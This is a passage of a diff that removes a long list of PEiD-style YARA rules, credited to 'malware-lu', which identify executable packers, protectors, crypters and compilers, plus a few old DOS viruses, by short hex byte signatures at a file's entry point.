-		$a0 = { 00 42 CD 21 72 31 B9 6E 03 33 D2 B4 40 CD 21 72 19 3B C1 75 15 B8 00 42 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VideoLanClient
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 83 EC 08 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CrunchPEv10xx
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 E8 ?? ?? ?? ?? 5D 83 ED 06 8B C5 55 60 89 AD ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 09 C6 85 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxTravJack883
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB ?? 9C 9E 26 ?? ?? 51 04 ?? 7D ?? 00 ?? 2E ?? ?? ?? ?? 8C C8 8E C0 8E D8 80 ?? ?? ?? ?? 74 ?? 8A ?? ?? ?? BB ?? ?? 8A ?? 32 C2 88 ?? FE C2 43 81 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RSCsProcessPatcherv151
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 00 20 40 00 E8 C3 01 00 00 80 38 00 74 0D 66 81 78 FE 22 20 75 02 EB 03 40 EB EE 8B F8 B8 04 60 40 00 68 C4 20 40 00 68 D4 20 40 00 6A 00 6A 00 6A 04 6A 00 6A 00 6A 00 57 50 E8 9F 01 00 00 85 C0 0F 84 39 01 00 00 BE 00 60 40 00 8B 06 A3 28 21 40 00 83 }
-
-condition:
-		$a0
-}
-	
-	
-rule kryptor9
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 ?? ?? ?? ?? 5E B9 ?? ?? ?? ?? 2B C0 02 04 0E D3 C0 49 79 F8 41 8D 7E 2C 33 46 ?? 66 B9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SecuPackv15
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 F0 53 56 57 33 C0 89 45 F0 B8 CC 3A 40 ?? E8 E0 FC FF FF 33 C0 55 68 EA 3C 40 ?? 64 FF 30 64 89 20 6A ?? 68 80 ?? ?? ?? 6A 03 6A ?? 6A 01 ?? ?? ?? 80 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule kryptor5
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 03 ?? ?? ?? E9 EB 6C 58 40 FF E0 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule kryptor6
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 03 ?? ?? ?? E9 EB 68 58 33 D2 74 02 E9 E9 40 42 75 02 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ACProtectV13Xrisco
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 50 E8 01 00 00 00 75 83 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PELockNTv202c
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 02 C7 85 1E EB 03 CD 20 EB EB 01 EB 9C EB 01 EB EB 02 CD }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02MinGWGCC2xAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 E8 02 00 00 00 C9 C3 90 90 45 58 45 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FreeBASIC016b
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 83 EC 08 C7 04 24 01 00 00 00 FF 15 ?? ?? ?? 00 E8 88 FF FF FF 89 EC 31 C0 5D C3 89 F6 55 89 E5 83 EC 08 C7 04 24 02 00 00 00 FF 15 ?? ?? ?? 00 E8 68 FF FF FF 89 EC 31 C0 5D C3 89 F6 55 89 E5 83 EC 08 8B 45 08 89 04 24 FF 15 ?? ?? ?? 00 89 EC 5D C3 8D 76 00 8D BC 27 00 00 00 00 55 89 E5 83 EC 08 8B 45 08 89 04 24 FF 15 ?? ?? ?? 00 89 EC 5D C3 90 90 90 90 90 90 90 90 90 90 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RCryptorv16bv16cVaska
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B C7 03 04 24 2B C7 80 38 50 0F 85 1B 8B 1F FF 68 }
-	$a1 = { 8B C7 03 04 24 2B C7 80 38 50 0F 85 1B 8B 1F FF 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule FileShield
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 1E EB ?? 90 00 00 8B D8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SDC12SelfDecryptingBinaryGeneratorbyClaesMNyberg
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 83 EC 08 C7 04 24 01 00 00 00 FF 15 A0 91 40 00 E8 DB FE FF FF 55 89 E5 53 83 EC 14 8B 45 08 8B 00 8B 00 3D 91 00 00 C0 77 3B 3D 8D 00 00 C0 72 4B BB 01 00 00 00 C7 44 24 04 00 00 00 00 C7 04 24 08 00 00 00 E8 CE 24 00 00 83 F8 01 0F 84 C4 00 00 00 85 C0 0F 85 A9 00 00 00 31 C0 83 C4 14 5B 5D C2 04 00 3D 94 00 00 C0 74 56 3D 96 00 00 C0 74 1E 3D 93 00 00 C0 75 E1 EB B5 3D 05 00 00 C0 8D B4 26 00 00 00 00 74 43 3D 1D 00 00 C0 75 CA C7 44 24 04 00 00 00 00 C7 04 24 04 00 00 00 E8 73 24 00 00 83 F8 01 0F 84 99 00 00 00 85 C0 74 A9 C7 04 24 04 00 00 00 FF D0 B8 FF FF FF FF EB 9B 31 DB 8D 74 26 00 E9 69 FF FF FF C7 44 24 04 00 00 00 00 C7 04 24 0B 00 00 00 E8 37 24 00 00 83 F8 01 74 7F 85 C0 0F 84 6D FF FF FF C7 04 24 0B 00 00 00 8D 76 00 FF D0 B8 FF FF FF FF E9 59 FF FF FF C7 04 24 08 00 00 00 FF D0 B8 FF FF FF FF E9 46 FF FF FF C7 44 24 04 01 00 00 00 C7 04 24 08 00 00 00 E8 ED 23 00 00 B8 FF FF FF FF 85 DB 0F 84 25 FF FF FF E8 DB 15 00 00 B8 FF FF FF FF E9 16 FF FF FF C7 44 24 04 01 00 00 00 C7 04 24 04 00 00 00 E8 BD 23 00 00 B8 FF FF FF FF E9 F8 FE FF FF C7 44 24 04 01 00 00 00 C7 04 24 0B 00 00 00 E8 9F 23 00 00 B8 FF FF FF FF E9 DA FE FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PKLITEv1501
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 06 ?? ?? 72 ?? B4 ?? BA ?? ?? CD 21 B8 ?? ?? CD 21 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Inbuildv10hard
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B9 ?? ?? BB ?? ?? 2E ?? ?? 2E ?? ?? 43 E2 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ExeShieldvxx
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 65 78 65 73 68 6C 2E 64 6C 6C C0 5D 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RCryptorv20Vaska
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { F7 D1 83 F1 FF 6A 00 F7 D1 83 F1 FF 81 04 24 ?? 02 00 00 F7 D1 83 F1 FF 59 BA 32 21 ?? 00 F7 D1 83 F1 FF F7 D1 83 F1 FF 80 02 E3 F7 D1 83 F1 FF C0 0A 05 F7 D1 83 F1 FF 80 02 6F F7 D1 83 F1 FF 80 32 A4 F7 D1 83 F1 FF 80 02 2D F7 D1 83 F1 FF 42 49 85 C9 75 CD 1C 4F 8D 5B FD 62 1E 1C 4F 8D 5B FD 4D 9D B9 ?? ?? ?? 1E 1C 4F 8D 5B FD 22 1C 4F 8D 5B FD 8E A2 B9 B9 E2 83 DB E2 E5 4D CD 1E BF 60 AB 1F 4D DB 1E 1E 3D 1E 92 1B 8E DC 7D EC A4 E2 4D E5 20 C6 CC B2 8E EC 2D 7D DC 1C 4F 8D 5B FD 83 56 8E E0 3A 7D D0 8E 9D 6E 7D D6 4D 25 06 C2 AB 20 CC 3A 4D 2D 9D 6B 0B 81 45 CC 18 4D 2D 1F A1 A1 6B C2 CC F7 E2 4D 2D 9E 8B 8B CC DE 2E 2D F7 1E AB 7D 45 92 30 8E E6 B9 7D D6 8E 9D 27 DA FD FD 1E 1E 8E DF B8 7D CF 8E A3 4D 7D DC 1C 4F 8D 5B FD 33 D7 1E 1E 1E A6 0B 41 A1 A6 42 61 6B 41 6B 4C 45 1E 21 F6 26 BC E2 62 1E 62 1E 62 1E 23 63 59 ?? 1E 62 1E 62 1E 33 D7 1E 1E 1E 85 6B C2 41 AB C2 9F 23 6B C2 41 A1 1E C0 FD F0 FD 30 20 33 9E 1E 1E 1E 85 A2 0B 8B C2 27 41 EB A1 A2 C2 1E C0 FD F0 FD 30 62 1E 33 7E 1E 1E 1E C6 2D 42 AB 9F 23 6B C2 41 A1 1E C0 FD F0 FD 30 C0 FD F0 8E 1D 1C 4F 8D 5B FD E0 00 33 5E 1E 1E 1E BF 0B EC C2 E6 42 A2 C2 45 1E C0 FD F0 FD 30 CE 36 CC F2 1C 4F 8D 5B FD }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv125
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 70 40 90 ?? 90 01 85 9E 70 40 BB ?? F3 0D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RCryptorv1Vaska
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 58 90 50 90 8B 00 90 3C 50 90 58 0F 85 67 D6 EF 11 50 68 }
-	$a1 = { 90 58 90 50 90 8B 00 90 3C 50 90 58 0F 85 67 D6 EF 11 50 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule PECompactv122
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 ?? 70 40 ?? 90 90 01 85 9E 70 40 ?? BB F3 08 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Packmanv10BrandonLaCombe
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5B 8D 5B C6 01 1B 8B 13 8D 73 14 6A 08 59 01 16 AD 49 75 FA 8B E8 C6 06 E9 8B 43 0C 89 46 01 6A 04 68 00 10 00 00 FF 73 08 51 FF 55 08 8B }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SpecialEXEPaswordProtectorV101EngPavolCerven
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 89 AD 8C 01 00 00 8B C5 2B 85 FE 75 00 00 89 85 3E }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ExeSmashervxx
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C FE 03 ?? 60 BE ?? ?? 41 ?? 8D BE ?? 10 FF FF 57 83 CD FF EB 10 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEArmor046ChinaCrackingGroup
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 AA 00 00 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 3D ?? ?? 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B ?? ?? 00 5C ?? ?? 00 6F ?? ?? 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VMProtect106107PolyTech
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 68 00 00 00 00 8B 74 24 28 BF ?? ?? ?? ?? FC 89 F3 03 34 24 AC 00 D8 }
-
-condition:
-		$a0
-}
-	
-	
-rule USSR031bySpirit
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 5D 83 C5 12 55 C3 20 83 B8 ED 20 37 EF C6 B9 79 37 9E 8C C9 30 C9 E3 01 C3 BE 32 ?? ?? ?? B0 ?? 30 06 8A 06 46 81 FE 00 ?? ?? ?? 7C F3 }
-
-condition:
-		$a0
-}
-	
-	
-rule PeCompact253DLLSlimLoaderBitSumTechnologies
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 32 00 00 08 0C 00 48 E1 01 56 57 53 55 8B 5C 24 1C 85 DB 0F 84 AB 21 E8 BD 0E E6 60 0D 0B 6B 65 72 6E 6C 33 32 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule LameCryptv10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 66 9C BB ?? ?? ?? ?? 80 B3 00 10 40 00 90 4B 83 FB FF 75 F3 66 9D 61 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Cygwin32
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 83 EC 04 83 3D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASProtectv123RC4build0807exeAlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule Armadillov210b2
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 18 12 41 00 68 24 A0 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov190
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 10 F2 40 00 68 64 9A 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule eXPressorProtection150XCGSoftLabs
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 68 EB 01 ?? ?? ?? ?? 83 EC 0C 53 56 57 EB 01 ?? 83 3D ?? ?? ?? ?? 00 74 08 EB 01 E9 E9 56 01 00 00 EB 02 E8 E9 C7 05 ?? ?? ?? ?? 01 00 00 00 EB 01 C2 E8 E2 05 00 00 EB 02 DA 9F 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? FF D0 59 59 EB 01 C8 EB 02 66 F0 68 ?? ?? ?? ?? E8 0E 05 00 00 59 EB 01 DD 83 65 F4 00 EB 07 8B 45 F4 40 89 45 F4 83 7D F4 61 73 1F EB 02 DA 1A 8B 45 F4 0F ?? ?? ?? ?? ?? ?? 33 45 F4 8B 4D F4 88 ?? ?? ?? ?? ?? EB 01 EB EB }
-
-condition:
-		$a0
-}
-	
-	
-rule VxNecropolis1963
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B4 30 CD 21 3C 03 ?? ?? B8 00 12 CD 2F 3C FF B8 ?? ?? ?? ?? B4 4A BB 40 01 CD 21 ?? ?? FA 0E 17 BC ?? ?? E8 ?? ?? FB A1 ?? ?? 0B C0 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Shrinkv20
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 ?? ?? 50 9C FC BE ?? ?? 8B FE 8C C8 05 ?? ?? 8E C0 06 57 B9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02UPX06Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PESpinV071cyberbob
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule XHider10GlobaL
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 EC 33 C0 89 45 EC B8 54 20 44 44 E8 DF F8 FF FF 33 C0 55 68 08 21 44 44 64 FF 30 64 89 20 8D 55 EC B8 1C 21 44 44 E8 E0 F9 FF FF 8B 55 EC B8 40 ?? ?? 44 E8 8B F5 FF FF 6A 00 6A 00 6A 02 6A 00 6A 01 68 00 00 00 40 A1 40 ?? ?? 44 E8 7E F6 FF FF 50 E8 4C F9 FF FF 6A 00 50 E8 4C F9 FF FF A3 28 ?? ?? 44 E8 CE FE FF FF 33 C0 5A 59 59 64 89 10 68 0F 21 44 44 8D 45 EC E8 F1 F4 FF FF C3 E9 BB F2 FF FF EB F0 E8 FC F3 FF FF FF FF FF FF 0E 00 00 00 63 3A 5C 30 30 30 30 30 30 31 2E 64 61 74 00 }
-	$a1 = { 85 D2 74 23 8B 4A F8 41 7F 1A 50 52 8B 42 FC E8 30 00 00 00 89 C2 58 52 8B 48 FC E8 48 FB FF FF 5A 58 EB 03 FF 42 F8 87 10 85 D2 74 13 8B 4A F8 49 7C 0D FF 4A F8 75 08 8D 42 F8 E8 5C FA FF FF C3 8D 40 00 85 C0 7E 24 50 83 C0 0A 83 E0 FE 50 E8 2F FA FF FF 5A 66 C7 44 02 FE 00 00 83 C0 08 5A 89 50 FC C7 40 F8 01 00 00 00 C3 31 C0 C3 90 }
-
-condition:
-		$a0 at pe.entry_point or $a1
-}
-	
-	
-rule PseudoSigner01MicrosoftVisualC70DLLAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8D 6C 01 00 81 EC 00 00 00 00 8B 45 90 83 F8 01 56 0F 84 00 00 00 00 85 C0 0F 84 ?? ?? ?? ?? E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXEShieldV05Smoke
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D 81 ED BC 1A 40 00 EB 01 00 8D B5 46 1B 40 00 BA B3 0A 00 00 EB 01 00 8D 8D F9 25 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40 }
-	$a1 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D 81 ED BC 1A 40 00 EB 01 00 8D B5 46 1B 40 00 BA B3 0A 00 00 EB 01 00 8D 8D F9 25 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40 50 C3 8A 06 46 EB 01 00 D0 C8 E8 14 00 00 00 83 EB 01 00 2A C2 E8 00 00 00 00 5B 83 C3 07 53 C3 00 EB 04 5B 43 53 C3 EB 01 00 32 C2 E8 0B 00 00 00 00 32 C1 EB 01 00 C0 C0 02 EB 09 2A C2 5B EB 01 00 43 53 C3 88 07 EB 01 00 47 4A 75 B4 90 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule UnnamedScrambler25Ap0ke
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC B9 0B 00 00 00 6A 00 6A 00 49 75 F9 51 53 56 57 B8 6C 3E 40 00 E8 F7 EA FF FF 33 C0 55 68 60 44 40 00 64 FF 30 64 89 20 BA 70 44 40 00 B8 B8 6C 40 00 E8 62 F3 FF FF 8B D8 85 DB 75 07 6A 00 E8 A1 EB FF FF BA E8 64 40 00 8B C3 8B 0D B8 6C 40 00 E8 37 D3 FF FF C7 05 BC 6C 40 00 0A 00 00 00 BB 68 6C 40 00 BE 90 6C 40 00 BF E8 64 40 00 B8 C0 6C 40 00 BA 04 00 00 00 E8 07 EC FF FF 83 3B 00 74 04 33 C0 89 03 8B D7 8B C6 E8 09 F3 FF FF 89 03 83 3B 00 0F 84 BB 04 00 00 B8 C0 6C 40 00 8B 16 E8 06 E2 FF FF B8 C0 6C 40 00 E8 24 E1 FF FF 8B D0 8B 03 8B 0E E8 D1 D2 FF FF 8B C7 A3 20 6E 40 00 8D 55 EC 33 C0 E8 0C D4 FF FF 8B 45 EC B9 1C 6E 40 00 BA 18 6E 40 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule Armadillov177
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 B0 71 40 00 68 6C 37 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxTrivial25
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B4 4E FE C6 CD 21 B8 ?? 3D BA ?? 00 CD 21 93 B4 40 CD }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov171
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule KBySV022shoooo
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 ?? ?? ?? ?? E8 01 00 00 00 C3 C3 11 55 07 8B EC B8 ?? ?? ?? ?? E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule InnoSetupModule
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 49 6E 6E 6F 53 65 74 75 70 4C 64 72 57 69 6E 64 6F 77 00 00 53 54 41 54 49 43 }
-	$a1 = { 55 8B EC 83 C4 ?? 53 56 57 33 C0 89 45 F0 89 45 ?? 89 45 ?? E8 ?? ?? FF FF E8 ?? ?? FF FF E8 ?? ?? FF FF E8 ?? ?? FF FF E8 ?? ?? FF FF }
-
-condition:
-		$a0 at pe.entry_point or $a1
-}
-	
-	
-rule piritv15
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 5B 24 55 50 44 FB 32 2E 31 5D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SoftSentryv30
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 EC ?? 53 56 57 E9 B0 06 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EncryptPEV22007411WFS
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 9C 64 FF 35 00 00 00 00 E8 1B 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 54 65 6D 70 50 61 74 68 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov19x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 98 ?? ?? ?? 68 10 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov285
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 68 ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 28 ?? ?? ?? 33 D2 8A D4 89 15 24 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASProtectvxx
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 ?? ?? ?? ?? ?? 90 5D ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 03 DD }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ExeShieldv17
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 90 1F 06 00 C3 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Splasherv10v30
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 8B 44 24 24 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 50 E8 ED 02 ?? ?? 8C C0 0F 84 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FreeCryptor01build002GlOFF
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B 04 24 40 90 83 C0 07 80 38 90 90 74 02 EB FF 90 68 27 ?? ?? 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 FF E4 90 8B 04 24 64 A3 00 00 00 00 8B 64 24 08 90 83 C4 08 }
-
-condition:
-		$a0
-}
-	
-	
-rule EXEShieldV06SMoKE
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D 81 ED D4 1A 40 00 EB 01 00 8D B5 5E 1B 40 00 BA A1 0B 00 00 EB 01 00 8D 8D FF 26 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40 }
-	$a1 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D 81 ED D4 1A 40 00 EB 01 00 8D B5 5E 1B 40 00 BA A1 0B 00 00 EB 01 00 8D 8D FF 26 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40 50 C3 8A 06 46 EB 01 00 D0 C8 E8 14 00 00 00 83 EB 01 00 2A C2 E8 00 00 00 00 5B 83 C3 07 53 C3 00 EB 04 5B 43 53 C3 EB 01 00 32 C2 E8 0B 00 00 00 00 32 C1 EB 01 00 C0 C0 02 EB 09 2A C2 5B EB 01 00 43 53 C3 88 07 EB 01 00 47 4A 75 B4 90 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02MicrosoftVisualBasic5060Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 ?? ?? ?? ?? E8 0A 00 00 00 00 00 00 00 00 00 30 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPack118DllLZMA430ap0x
-{
-      meta:
-		author="malware-lu"
-strings:
